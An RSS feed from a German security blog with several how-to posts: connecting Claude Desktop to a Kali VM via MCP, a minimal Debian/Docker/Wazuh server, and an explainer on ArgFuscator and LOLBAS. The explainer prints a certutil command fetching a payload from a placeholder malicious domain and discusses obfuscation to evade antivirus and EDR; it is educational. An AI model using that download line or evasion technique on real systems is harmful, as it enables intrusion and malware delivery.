<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title></title>
	<atom:link href="https://pentestit.de/feed/" rel="self" type="application/rss+xml" />
	<link>https://pentestit.de/</link>
	<description>Yet Another Infosec Website</description>
	<lastBuildDate>Thu, 12 Feb 2026 13:51:19 +0000</lastBuildDate>
	<language>de</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>
	<item>
		<title>AI-Powered Pentesting: Verbindung von Claude Desktop mit einer Kali-Linux-VM</title>
		<link>https://pentestit.de/ai-powered-pentesting-verbindung-von-claude-desktop-mit-einer-kali-linux-vm/</link>
					<comments>https://pentestit.de/ai-powered-pentesting-verbindung-von-claude-desktop-mit-einer-kali-linux-vm/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Thu, 12 Feb 2026 13:39:01 +0000</pubDate>
				<category><![CDATA[Howto]]></category>
		<category><![CDATA[ClaudeAI]]></category>
		<category><![CDATA[EthicalHacking]]></category>
		<category><![CDATA[KaliLinux]]></category>
		<category><![CDATA[macOS]]></category>
		<category><![CDATA[MCP]]></category>
		<category><![CDATA[Pentesting]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5247</guid>

					<description><![CDATA[<p>In der Welt des Penetration Testings halten LLMs (Large Language Models) zunehmend Einzug. Ein Chatbot, der lediglich theoretische Ratschläge erteilt, [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ai-powered-pentesting-verbindung-von-claude-desktop-mit-einer-kali-linux-vm/">AI-Powered Pentesting: Verbindung von Claude Desktop mit einer Kali-Linux-VM</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>In der Welt des Penetration Testings halten LLMs (Large Language Models) zunehmend Einzug. Ein Chatbot, der lediglich theoretische Ratschläge erteilt, ist jedoch oft weniger nützlich als ein System, das direkt interagieren kann.</p>



<p>Dieses Tutorial beschreibt die Vorgehensweise, um&nbsp;<strong>Claude Desktop</strong>&nbsp;auf einem Mac mit einer&nbsp;<strong>Kali Linux VM</strong>&nbsp;zu verbinden. Hierfür kommt das&nbsp;<strong>Model Context Protocol (MCP)</strong>&nbsp;zum Einsatz.</p>



<p>Das Besondere an diesem Setup: Das macOS-System bleibt frei von lokal installierten Hacking-Tools, da die gesamte Kommunikation sicher getunnelt über SSH erfolgt.</p>



<h2 class="wp-block-heading">Der Versuchsaufbau (Lab Setup)</h2>



<p>Für das Verständnis der Architektur ist ein Blick auf die Netzwerkkonfiguration hilfreich. Das Setup besteht aus zwei Maschinen im lokalen Netzwerk:</p>



<ol class="wp-block-list">
<li><strong>Der Controller (macOS):</strong> Hier wird die Claude Desktop App ausgeführt. IP: <code>192.168.171.37</code> (Beispieladresse).</li>



<li><strong>Das Werkzeug (Kali Linux VM):</strong> Auf diesem System sind die Pentesting-Tools installiert. IP: <code>192.168.171.38</code>(Beispieladresse, diese ist an das eigene Netzwerk anzupassen).</li>
</ol>



<figure class="wp-block-image size-large is-resized"><img fetchpriority="high" decoding="async" width="1024" height="1012" src="https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57-1024x1012.jpg" alt="" class="wp-image-5251" style="aspect-ratio:1.011806375442739;width:515px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57-1024x1012.jpg 1024w, https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57-1536x1518.jpg 1536w, https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57-300x297.jpg 300w, https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57-768x759.jpg 768w, https://pentestit.de/wp-content/uploads/2026/02/Bildschirmfoto-2026-02-12-um-14.17.57.jpg 1888w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h3 class="wp-block-heading">Funktionsweise des Kali-MCP-Servers</h3>



<p>Eine häufige Hürde bei der Einrichtung ist das Verständnis der Komponenten auf der Kali-Seite. Es arbeiten zwei Elemente zusammen:</p>



<ol class="wp-block-list">
<li><strong>Das Backend (<code>kali-server-mcp</code>):</strong> Ein Flask-Webserver, der mit Root-Rechten (via sudo) ausgeführt wird. Er lauscht standardmäßig auf Port 5000 und führt die Befehle (wie z. B. <code>nmap -O</code>) aus.</li>



<li><strong>Die Bridge (<code>mcp_server.py</code>):</strong> Ein Python-Skript, das als Übersetzer fungiert. Claude Desktop nutzt das &#8222;MCP&#8220;-Protokoll (ein JSON-Format über Standard-Input/Output), während der Webserver HTTP spricht. Die Bridge nimmt die Befehle von Claude entgegen und leitet sie an den lokalen Webserver weiter.</li>
</ol>



<p><strong>Der Vorteil:</strong>&nbsp;Die Bridge muss nicht manuell gestartet werden. Claude baut eine SSH-Verbindung zur Kali-VM auf und initiiert die Bridge automatisch.</p>



<h2 class="wp-block-heading">Schritt-für-Schritt Anleitung</h2>



<h3 class="wp-block-heading">Voraussetzungen</h3>



<ul class="wp-block-list">
<li>Mac mit installierter Claude Desktop App.</li>



<li>Kali Linux VM</li>



<li>Beide Geräte befinden sich im selben Netzwerk.</li>
</ul>



<h3 class="wp-block-heading">Schritt 1: Installation der Pakete auf Kali</h3>



<p>Zunächst müssen die erforderlichen Pakete auf der Kali-VM installiert werden. In aktuellen Kali-Versionen sind diese direkt über den Paketmanager verfügbar.</p>



<p>Das Terminal auf der Kali-VM öffnen und folgende Befehle ausführen:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">sudo apt update
sudo apt install -y mcp-kali-server
</code></pre>



<p><em>Hinweis: Dieses Paket installiert sowohl den Backend-Webserver (<code>kali-server-mcp</code>) als auch das notwendige Client-Skript (<code>mcp_server.py</code>).</em></p>



<h3 class="wp-block-heading">Schritt 2: Starten des Backend-Servers auf Kali</h3>



<p>Nach der Installation muss der Server gestartet werden. Dieser Prozess ist notwendig, damit die Bridge später eine Gegenstelle hat.</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash"># Auf der Kali VM
sudo kali-server-mcp --port 5000
</code></pre>



<p><em>Das Terminal sollte geöffnet bleiben. Die Ausgabe sollte lauten:&nbsp;<code>Running on http://127.0.0.1:5000</code>.</em></p>



<h3 class="wp-block-heading">Schritt 3: Einrichtung von Passwordless SSH</h3>



<p>Damit Claude im Hintergrund agieren kann, muss der SSH-Login vom Mac zur Kali-VM <strong>ohne Passworteingabe</strong> möglich sein.</p>



<ol class="wp-block-list">
<li><strong>Generierung der SSH-Keys auf dem Mac (falls nicht vorhanden):</strong><code>ssh-keygen -t ed25519 # WICHTIG: Es darf kein Passwort (Passphrase) gesetzt werden (einfach Enter drücken).</code></li>



<li><strong>Übertragung des Keys auf die Kali-VM:</strong> Der Platzhalter <code>user</code> ist durch den Kali-Benutzernamen und die IP durch die korrekte Kali-IP zu ersetzen.<code>ssh-copy-id user@192.168.171.38</code></li>



<li><strong>Funktionstest:</strong><code> ssh user@192.168.171.38 "echo Erfolg" </code><br>Erfolgt keine Passwortabfrage, ist die Konfiguration korrekt. </li>
</ol>



<h3 class="wp-block-heading">Schritt 4: Konfiguration von Claude Desktop</h3>



<p>Nun wird Claude angewiesen, bei Bedarf eine SSH-Verbindung aufzubauen und den Python-Client auf dem Zielsystem zu starten.</p>



<p>Die Konfigurationsdatei auf dem Mac ist zu öffnen:&nbsp;<code>~/Library/Application Support/Claude/claude_desktop_config.json</code></p>



<p>Folgender Inhalt ist einzufügen (Benutzer und IP sind anzupassen):</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">{
  "mcpServers": {
    "kali-remote": {
      "command": "ssh",
      "args": [
        "user@192.168.171.38",
        "python3",
        "/usr/share/mcp-kali-server/mcp_server.py", 
        "--server",
        "http://127.0.0.1:5000"
      ]
    }
  }
}
</code></pre>



<h3 class="wp-block-heading">Schritt 5: Pentesting mit KI-Unterstützung</h3>



<p>Nach einem Neustart von Claude Desktop sollten keine Fehlermeldungen erscheinen. Dann  können Befehle in natürlicher Sprache eingegeben werden:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>&#8222;Scanne das Netzwerk 192.168.171.0/24 nach aktiven Hosts.&#8220; &#8222;Führe einen Nmap Version-Scan auf 192.168.171.1 durch und erkläre die offenen Ports.&#8220;</p>
</blockquote>



<p>Claude führt die Befehle auf der VM aus, liest den Output und analysiert diesen direkt.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Dieses Setup optimiert den Workflow erheblich. Die saubere Benutzeroberfläche von Claude auf dem Mac bleibt erhalten, während die volle Leistungsfähigkeit der Kali-Tools in einer isolierten VM genutzt wird. Durch den Einsatz des SSH-Tunnels müssen zudem keine unsicheren Webserver im Netzwerk exponiert werden.</p>
<p>Der Beitrag <a href="https://pentestit.de/ai-powered-pentesting-verbindung-von-claude-desktop-mit-einer-kali-linux-vm/">AI-Powered Pentesting: Verbindung von Claude Desktop mit einer Kali-Linux-VM</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ai-powered-pentesting-verbindung-von-claude-desktop-mit-einer-kali-linux-vm/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Debian Server light mit Docker und Wazuh-Agent (Debian 13 Minimal)</title>
		<link>https://pentestit.de/debian-server-light-mit-docker-und-wazuh-agent-debian-13-minimal/</link>
					<comments>https://pentestit.de/debian-server-light-mit-docker-und-wazuh-agent-debian-13-minimal/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sat, 24 Jan 2026 15:06:21 +0000</pubDate>
				<category><![CDATA[Howto]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[minimal]]></category>
		<category><![CDATA[Server]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5241</guid>

					<description><![CDATA[<p>Diese Anleitung beschreibt den Aufbau eines&#160;ultraminimalen Servers, auf dem nur folgende Dienste laufen: Alles andere wird konsequent weggelassen.Firewall-Regeln werden über [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/debian-server-light-mit-docker-und-wazuh-agent-debian-13-minimal/">Debian Server light mit Docker und Wazuh-Agent (Debian 13 Minimal)</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Diese Anleitung beschreibt den Aufbau eines&nbsp;<strong>ultraminimalen Servers</strong>, auf dem nur folgende Dienste laufen:</p>



<ul class="wp-block-list">
<li><strong>Docker</strong>&nbsp;für alle produktiven Anwendungen</li>



<li><strong>Wazuh-Agent</strong>&nbsp;zur Host- und Containerüberwachung</li>



<li>systemd + SSH</li>
</ul>



<p><strong>Alles andere wird konsequent weggelassen.</strong><br>Firewall-Regeln werden über die nativen Docker-Netzwerke und den Reverse Proxy (Nginx Proxy Manager) gesteuert –&nbsp;<strong>kein ufw, kein iptables nötig</strong>.</p>



<h4 class="wp-block-heading"><strong>Schritt 1 – Debian 13 Minimalinstallation</strong></h4>



<ul class="wp-block-list">
<li>ISO:&nbsp;<strong>Debian 13 netinst</strong> herunterladen</li>



<li>Partitionierung (optional eigene Partition für /var/lib/docker)</li>



<li>Software-Auswahl:&nbsp;<strong>nur SSH-Server aktivieren</strong></li>



<li>Alles andere deaktivieren: Desktop, Standardwerkzeuge, Mail, Druck, Snap etc.</li>
</ul>



<p>Nach der Installation login als root.</p>



<h4 class="wp-block-heading"><strong>Schritt 2 – System aktualisieren und Grundpakete installieren</strong></h4>



<pre class="wp-block-code"><code lang="bash" class="language-bash">apt update &amp;&amp; apt upgrade -y
apt install -y ca-certificates curl gnupg wget lsb-release qemu-guest-agent sudo
</code></pre>



<h4 class="wp-block-heading"><strong>Schritt 3 – Docker installieren</strong></h4>



<pre class="wp-block-code"><code lang="bash" class="language-bash">curl -fsSL https://get.docker.com | sh
</code></pre>



<p>Testen:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">docker run hello-world
</code></pre>



<p>Optional: Einen Benutzer zur Docker-Gruppe hinzufügen, wenn du später nicht als Root arbeiten willst:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">usermod -aG docker DEIN_BENUTZER
</code></pre>



<h4 class="wp-block-heading"><strong>Schritt 4 – Wazuh-Agent installieren</strong></h4>



<p>Paket herunterladen. Achtung: Hier Version der Software und IP des Wazuh-Servers entsprechend anpassen.</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">cd /tmp
wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.1-1_amd64.deb &amp;&amp; sudo WAZUH_MANAGER='192.168.171.13' WAZUH_AGENT_NAME='test' dpkg -i ./wazuh-agent_4.14.1-1_amd64.deb
</code></pre>



<p>Hier jetzt die Konfiguration prüfen. Manchmal wird die IP-Adresse des Wazuh-Servers nicht richtig gesetzt:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">nano /var/ossec/etc/ossec.conf
</code></pre>



<p>Minimal:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">&lt;client&gt;
  &lt;server&gt;
    &lt;address&gt;WAZUH_MANAGER_IP&lt;/address&gt;
  &lt;/server&gt;
&lt;/client&gt;
</code></pre>



<p>Agent starten:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">systemctl enable wazuh-agent
systemctl start wazuh-agent
systemctl status wazuh-agent
</code></pre>



<h4 class="wp-block-heading"><strong>Schritt 5 – Nicht benötigte Dienste entfernen</strong></h4>



<pre class="wp-block-code"><code lang="bash" class="language-bash">systemctl disable --now avahi-daemon cups bluetooth ModemManager
apt purge exim4* cups* avahi-daemon bluetooth -y
apt autoremove --purge -y
</code></pre>



<h4 class="wp-block-heading"><strong>Schritt 6 – Logs begrenzen</strong></h4>



<p>nano /etc/systemd/journald.conf</p>



<p>Eintragen:</p>



<p>SystemMaxUse=300M<br>RuntimeMaxUse=100M</p>



<p>Danach:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">systemctl restart systemd-journald
</code></pre>



<h4 class="wp-block-heading"><strong>Schritt 7 – Dienste-Zustand prüfen</strong></h4>



<pre class="wp-block-code"><code lang="bash" class="language-bash">systemctl --type=service --state=running
</code></pre>



<p>Erlaubte Dienste:</p>



<ul class="wp-block-list">
<li>ssh</li>



<li>docker</li>



<li>wazuh-agent</li>



<li>systemd-journald</li>



<li>cron</li>



<li>network</li>
</ul>
<p>Der Beitrag <a href="https://pentestit.de/debian-server-light-mit-docker-und-wazuh-agent-debian-13-minimal/">Debian Server light mit Docker und Wazuh-Agent (Debian 13 Minimal)</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/debian-server-light-mit-docker-und-wazuh-agent-debian-13-minimal/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ausgabe der iX Special 2025 – Securitytools erschienen</title>
		<link>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/</link>
					<comments>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Thu, 06 Nov 2025 16:56:50 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Open Source]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5201</guid>

					<description><![CDATA[<p>Ich freue mich sehr, Ihnen heute unser neue Ausgabe des&#160;iX Special 2025 – Security Tools&#160;vorstellen zu dürfen – ein Sonderheft, [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/">Ausgabe der iX Special 2025 – Securitytools erschienen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Ich freue mich sehr, Ihnen heute unser neue Ausgabe des&nbsp;<a href="https://www.heise.de/select/ix/2025/13">iX Special 2025 – Security Tools&nbsp;</a>vorstellen zu dürfen – ein Sonderheft, das sich voll und ganz dem Thema Open Source-Sicherheitstools widmet. In dieser Ausgabe finden Sie eine breite Auswahl an frei verfügbaren Werkzeugen für Schwachstellenanalyse, Systemhärtung, Erkennung von Angriffen und die anschließende Reaktion.&nbsp;</p>



<figure class="wp-block-image size-full is-resized"><a href="https://www.heise.de/select/ix/2025/13"><img decoding="async" width="477" height="676" src="https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025.jpg" alt="" class="wp-image-5202" style="width:245px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025.jpg 477w, https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025-212x300.jpg 212w" sizes="(max-width: 477px) 100vw, 477px" /></a></figure>



<p>Weitere Informationen über <a href="https://frankneugebauer.eu/2025/11/06/ausgabe-der-ix-special-2025-securitytools-erschienen/">meinen Beitrag zum Sonderheft findet man hier</a>.</p>
<p>Der Beitrag <a href="https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/">Ausgabe der iX Special 2025 – Securitytools erschienen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Die Verschleierung enthüllen: Ein Einblick in ArgFuscator</title>
		<link>https://pentestit.de/die-verschleierung-enthuellen-ein-einblick-in-argfuscator/</link>
					<comments>https://pentestit.de/die-verschleierung-enthuellen-ein-einblick-in-argfuscator/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Mon, 14 Jul 2025 14:51:24 +0000</pubDate>
				<category><![CDATA[Howto]]></category>
		<category><![CDATA[Angriff]]></category>
		<category><![CDATA[Living-off-the-land]]></category>
		<category><![CDATA[Obfuscation]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5183</guid>

					<description><![CDATA[<p>In der sich ständig weiterentwickelnden Landschaft der Cybersicherheit sind sowohl Angreifer als auch Verteidiger stets auf der Suche nach neuen [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/die-verschleierung-enthuellen-ein-einblick-in-argfuscator/">Die Verschleierung enthüllen: Ein Einblick in ArgFuscator</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>In der sich ständig weiterentwickelnden Landschaft der Cybersicherheit sind sowohl Angreifer als auch Verteidiger stets auf der Suche nach neuen Techniken, um einen Vorteil zu erlangen. Ein faszinierendes Tool, das im Februar 2025 vorgestellt wurde, ist <a href="https://argfuscator.net">ArgFuscator</a>: eine Open-Source-Webanwendung und ein PowerShell-Modul, das vom Sicherheitsforscher <a href="https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation" target="_blank" rel="noreferrer noopener">Wietze</a> entwickelt wurde. Das Tool generiert obfuskierte Befehlszeilen für Windows-Executables, um vor allem Verteidiger und Sicherheitslösungen wie Antivirus (AV) und Endpoint Detection and Response (EDR) zu frustrieren und manchmal sogar die Erkennung vollständig zu umgehen.</p>



<h4 class="wp-block-heading"><strong>Die Kunst der Befehlszeilen-Verschleierung</strong></h4>



<p>Die Befehlszeilenverschleierung ist eine ausgeklügelte Technik, die von Bedrohungsakteuren eingesetzt wird, um ihre Aktivitäten zu verbergen und der Erkennung zu entgehen. Dies wird durch verschiedene Manipulationen erreicht, zu denen die Änderung von Zeichenketten, die Verschleierung von Dateipfaden und die Integration von Unicode-Zeichen gehören, um die wahre Natur von Befehlen zu maskieren. Viele Advanced-Persistent-Threat-(APT)-Gruppen sind dafür bekannt, solche Verschleierungstechniken als Kernbestandteil ihrer Angriffsmethoden einzusetzen.</p>



<h4 class="wp-block-heading"><strong>Was muss man wissen?</strong></h4>



<p>Bevor wir uns mit ArgFuscator beschäftigen, sollte der Begriff „Living off the Land” (zu Deutsch etwa „vom Land leben”) erläutert werden. Dabei handelt es sich um eine Angriffstechnik, bei der Cyberkriminelle ausschließlich legitime, bereits auf einem System vorhandene Werkzeuge und Programme für ihre bösartigen Zwecke missbrauchen. Anstatt eigene Malware auf das Zielsystem zu schleusen, die von Antivirenprogrammen leichter erkannt werden könnte, nutzen sie die Bordmittel des Betriebssystems (wie PowerShell, WMI oder certutil.exe unter Windows) oder andere bereits installierte Software.</p>



<p>Hier kommt das LOLBAS-Projekt (Living Off the Land Binaries and Scripts) ins Spiel. Bei diesem von der Sicherheits-Community betriebenen Open-Source-Projekt wird dokumentiert, wie diese bordeigenen Windows-Programme (Binaries, Scripts, Libraries) für böswillige Zwecke missbraucht werden können.</p>



<p>Die zentrale Anlaufstelle dieses Projekts ist die Website <a href="https://lolbas-project.github.io/" target="_blank" rel="noreferrer noopener">https://lolbas-project.github.io/</a>. Sie listet Hunderte von Windows-Dateien auf und beschreibt detailliert, wie jede einzelne für Aktionen missbraucht werden kann, für die sie ursprünglich nicht gedacht war. Verteidiger (Blue Teams) nutzen diese Datenbank, um verdächtige Aktivitäten besser zu erkennen und zu verstehen, während Angreifer (Red Teams) sie nutzen, um neue Angriffspfade zu finden.</p>



<p><strong>Wie ArgFuscator funktioniert</strong></p>



<p>Das folgende Beispiel soll eine mögliche Gefahr verdeutlichen: <code style="white-space: normal;"><span class="selected">Certutil.exe</span></code><span class="selected" style="white-space: normal;">&nbsp;ist ein legitimes Kommandozeilenprogramm in Windows, das eigentlich zur Verwaltung von Zertifikaten dient. Ein Blick in die <a href="https://lolbas-project.github.io/lolbas/Binaries/Certutil/">LOLBAS-Datenbank </a>zeigt jedoch, wie es von Angreifern zweckentfremdet werden kann.</span></p>



<p>Ein Angreifer hat bereits einen ersten Zugang zu einem System erlangt und möchte nun weitere Schadsoftware (z.B. einen Trojaner namens&nbsp;<code>payload.exe</code>) nachladen. Viele Unternehmen blockieren den direkten Download von&nbsp;<code>.exe</code>-Dateien über den Browser oder Firewalls. PowerShell-Downloads werden oft ebenfalls streng überwacht.&nbsp;<code>Certutil.exe</code>hingegen wird selten blockiert. Der Angreifer kann nun folgenden, in der LOLBAS-Datenbank dokumentierten Befehl verwenden:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">certutil.exe -urlcache -split -f "http://boesartige-domain.com/payload.exe" C:\temp\virus.exe</code></pre>



<p><em>Was bedeuten die Parameter?</em></p>



<ul class="wp-block-list">
<li><code>certutil.exe</code>: Das legitime Windows-Tool wird aufgerufen.</li>



<li><code>-urlcache -split -f</code>: Diese Parameter weisen das Tool an, eine Datei von einer URL herunterzuladen und im Dateisystem zu speichern.</li>



<li><code>"http://boesartige-domain.com/payload.exe"</code>: Dies ist die Adresse, unter der die Schadsoftware liegt.</li>



<li><code>C:\temp\virus.exe</code>: Dies ist der Speicherort und der neue Name der heruntergeladenen Datei auf dem Zielsystem.</li>
</ul>



<p>Für ein Sicherheitssystem sieht diese Aktion zunächst wie eine legitime Zertifikatsoperation aus. Tatsächlich wurde aber das System kompromittiert, indem eine Datei heruntergeladen wurde, ohne dass klassische Alarmglocken schrillen. Die LOLBAS-Datenbank liefert dem Angreifer also die exakte Syntax und Idee für diesen heimlichen Download.</p>



<p>Um die Absicht des Angreifers weiter zu verschleiern, kommt <a href="https://argfuscator.net">ArgFuscator</a> ins Spiel. Das Tool wandelt den standardmäßig leicht erkennbaren Befehl in eine stark obfuskierte Version um. Während der ursprüngliche Befehl sofortige Warnungen auslösen könnte, ist sein obfuskierter Gegenpart für Sicherheitslösungen erheblich schwieriger zu identifizieren.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="319" src="https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-1024x319.jpg" alt="" class="wp-image-5187" srcset="https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-1024x319.jpg 1024w, https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-1536x478.jpg 1536w, https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-2048x638.jpg 2048w, https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-300x93.jpg 300w, https://pentestit.de/wp-content/uploads/2025/07/ArgFuscator-768x239.jpg 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h3 class="wp-block-heading">Fazit</h3>



<p>ArgFuscator erweist sich als wertvolle Ressource für folgende offensive und defensive Sicherheitsexperten.</p>



<ul class="wp-block-list">
<li><strong>Red Teaming/Penetration Testing:</strong> Auf der offensiven Seite ermöglicht Argfuscator die Emulation von Angreifertechniken und vermittelt so ein tieferes Verständnis dafür, wie Bedrohungsakteure in realen Szenarien agieren.</li>



<li><strong>Defensive Sicherheit (Blue Teaming)</strong>: Verteidiger können dieses Tool nutzen, um die Wirksamkeit ihrer Erkennungsmechanismen gegen Befehlszeilen, die verschiedenen Verschleierungstechniken unterzogen wurden, rigoros zu testen. So können sie Lücken in ihrer Sicherheitslage identifizieren und ihre Erkennungsregeln verfeinern.</li>
</ul>



<p>Das folgende interessante <a href="https://www.youtube.com/watch?v=6-Gbv0h7m1I&amp;t=123s" target="_blank" rel="noreferrer noopener">Video von John Hammond</a>, das die Zusammenhänge erklärt und ein praktisches Beispiel bringt, ist sehr zu empfehlen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="how hackers avoid getting caught" width="1280" height="720" src="https://www.youtube.com/embed/6-Gbv0h7m1I?start=123&#038;feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
<p>Der Beitrag <a href="https://pentestit.de/die-verschleierung-enthuellen-ein-einblick-in-argfuscator/">Die Verschleierung enthüllen: Ein Einblick in ArgFuscator</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/die-verschleierung-enthuellen-ein-einblick-in-argfuscator/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Wazuh auf einem Raspberry Pi 4 installieren</title>
		<link>https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Fri, 23 May 2025 12:33:55 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[Raspberry Pi]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5179</guid>

					<description><![CDATA[<p>Dieser Blogeintrag beschreibt, wie man die Open-Source-Sicherheitsplattform Wazuh auf einem Raspberry Pi 4 installiert und einrichtet. Ziel ist es, ein [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/">Wazuh auf einem Raspberry Pi 4 installieren</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Dieser <a href="https://wazuh.frankneugebauer.eu/wazuh-auf-raspberry-pi-4-installieren/">Blogeintrag</a> beschreibt, wie man die Open-Source-Sicherheitsplattform Wazuh auf einem Raspberry Pi 4 installiert und einrichtet. Ziel ist es, ein günstiges und leistungsfähiges SIEM-System (Security Information and Event Management) für kleine Netzwerke oder den Heimgebrauch bereitzustellen, da kommerzielle Lösungen oft zu teuer oder komplex sind.</p>



<p>Die Anleitung führt durch folgende Schritte:</p>



<ul class="wp-block-list">
<li>Vorbereitung des Raspberry Pi 4, meist mit einem aktuellen Raspberry Pi OS (ARM64).</li>



<li>Installation der benötigten Softwarepakete und Hinzufügen des Wazuh-Repositorys.</li>



<li>Installation und Konfiguration der Wazuh-Komponenten (z. B. Agent, Server, Dashboard) auf dem Raspberry Pi.</li>



<li>Starten und Aktivieren der Wazuh-Dienste, damit sie beim Systemstart automatisch laufen.</li>



<li>Abschließend Zugriff auf das Wazuh Dashboard zur Überwachung und Verwaltung der Sicherheitsereignisse.</li>
</ul>



<p>Der <a href="https://wazuh.frankneugebauer.eu/wazuh-auf-raspberry-pi-4-installieren/">Blogeintrag</a> hebt hervor, dass die Installation zwar einige Schritte erfordert, aber mit der Anleitung auch für Einsteiger nachvollziehbar ist. Das Ergebnis ist eine kostengünstige, aber leistungsfähige Sicherheitslösung für kleine Netzwerke.</p>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/">Wazuh auf einem Raspberry Pi 4 installieren</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>MalDuino W &#8211; WLAN Passwörter auslesen</title>
		<link>https://pentestit.de/malduino-w-wlan-passwoerter-auslesen/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Tue, 25 Mar 2025 16:26:31 +0000</pubDate>
